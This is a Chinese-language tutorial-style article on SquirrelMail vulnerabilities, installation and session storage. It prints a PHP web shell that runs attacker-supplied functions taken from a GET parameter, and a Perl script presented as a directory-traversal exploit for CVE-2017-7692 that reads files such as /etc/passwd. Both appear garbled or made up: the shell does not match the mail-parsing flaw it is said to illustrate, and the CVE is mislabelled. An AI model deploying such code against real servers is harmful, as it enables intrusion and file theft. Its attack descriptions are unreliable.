一、Squirrelmail漏洞
Squirrelmail是一款较为安全的webmail软件,然而在实际使用过程中仍然可能存在漏洞。例如,2017年Squirrelmail 1.4.22版存在远程命令执行漏洞,只要攻击者向Squirrelmail发送特殊形式的邮件,就可以在系统中执行任意命令。
<?php
//解析邮件信息中传递的参数
$o = unserialize(base64_decode($_GET[‘_POST’]));
ob_start();
@call_user_func($o[‘func’], $o[‘args’]);
$r = ob_get_clean();
//输出命令执行结果
echo base64_encode($r);
?>
攻击者通过构建特定邮件,使得Squirrelmail解析该邮件时执行“_POST”参数中传递的命令,通过base64编码后将命令结果输出。
二、Squirrelmail用户名密码存在哪里
Squirrelmail用户名密码并没有保存在程序中,而是通过PHP的Session保存在服务器上。当用户首次登录时,Squirrelmail会生成一个PHP Session,将用户的用户名和密码以及其他信息存储到Session中,然后通过cookie将Session ID传递给客户端。在用户后续的访问中,客户端会将cookie中的Session ID传递给服务器,服务器通过Session ID获取用户的信息。
三、Squirrelmail安装
在Linux系统中,可以通过apt-get命令或yum命令快速安装Squirrelmail。对于Debian和Ubuntu系统:
$ sudo apt-get install squirrelmail
对于CentOS和Redhat系统:
$ sudo yum install squirrelmail
然后需要安装web服务器(如Apache)和PHP解释器,配置好服务器后就可以通过http://server_ip/squirrelmail访问Squirrelmail了。
四、Squirrelmail是什么
Squirrelmail是一款邮件客户端软件。与Outlook等传统邮件客户端不同,Squirrelmail是一个基于web的邮件客户端,用户直接通过web浏览器访问相应的服务器就可以读写电子邮件。
五、Squirrelmail漏洞利用
除了远程命令执行漏洞之外,Squirrelmail还存在其他的漏洞,如信息泄露漏洞、XSS漏洞等。在进行Squirrelmail漏洞利用时,攻击者通常会寻找Squirrelmail的漏洞报告以及相关的Exploit工具。例如,以下是一个Squirrelmail信息泄露漏洞的Exploit:
# Exploit Title: SquirrelMail 1.4.22 - Directory Traversal / Information Disclosure
# Exploit Author: LiquidWorm
# Date: 2017-03-22
# CVE: CVE-2017-7692
# Vendor Homepage: https://www.squirrelmail.org/
# Version: 1.4.22 and prior
# Tested on: Apache
# USA: http://www.zeroattack.com
# ITA: http://www.jimmymaker.com
#!/usr/bin/perl
# SquirrelMail 1.4.22 Directory Traversal Exploit
# by LiquidWorm
# dd 0803
use LWP::UserAgent;
print "\n[+] SquirrelMail 1.4.22 Directory Traversal Exploit\n";
print "[+] by LiquidWorm\n\n";
if(!$ARGV[1])
{
print "[+] Usage: perl $0
\n";
print "[+] Example: perl $0 http://mail.example.com/ ../../../../etc/passwd\n\n";
exit;
}
$url = $ARGV[0];
$file = $ARGV[1];
$file =~ s/\//%2f/g;
$file =~ s/ /%20/g;
$file =~ s/\\/%\\/g;
$host = $url;
$host =~ s/http:\/\///;
$host =~ s/\//%2f/g;
$url .= "src/right_main.php?PGVwXE5hbWU9J3NpbXBsZS5waHAnJzs%2fZXhwaXJlcz0xMzgxODQ1Njc2O2NvbnRlbnQ9JyZmb290ZXJhYmlsaXR5PS9iYXNoJyt0aW1lc3RhY2suY29tJytzZWNyZXQmZmRhdGE9JyZmaWxlJytmaWxlJy85LycuJyUyMGENYXJpYWwnO2V4cGlyZXM9MjtzdHJfcmVzdWx0PSZ0aW1lc3RhY2suY29tJytzZWNyZXQmZmRhdGE9J1snK3RhcmdldCddJytmaWxlJyUzQyUyRkVHSU4%3d&sort=0&startMessage=1&mailbox=INBOX&passed_id=&ent_id=0&actionID=&_list=1&_right=1&mailbox=foo%0aAttacking#$file\@localhost";
$agent = LWP::UserAgent->new() or die;
$request = HTTP::Request->new(GET => $url);
$response = $agent->request($request);
if ($response->content =~ /!!Cannot open.*/)
{
print "[-] File not found\n";
exit(1);
}
if($response->content_type =~ /text\/plain/)
{
print "[-] Not a plaintext response\n";
exit(1);
}
@rcvd = split(/\r?\n\r?\n/, $response->content);
syswrite STDOUT, $rcvd[1], length($rcvd[1]);
print "\n\n[-] Done\n";
该Exploit通过访问Squirrelmail内置的right_main.php页面来利用目标主机上的目录遍历漏洞,读取指定文件的内容。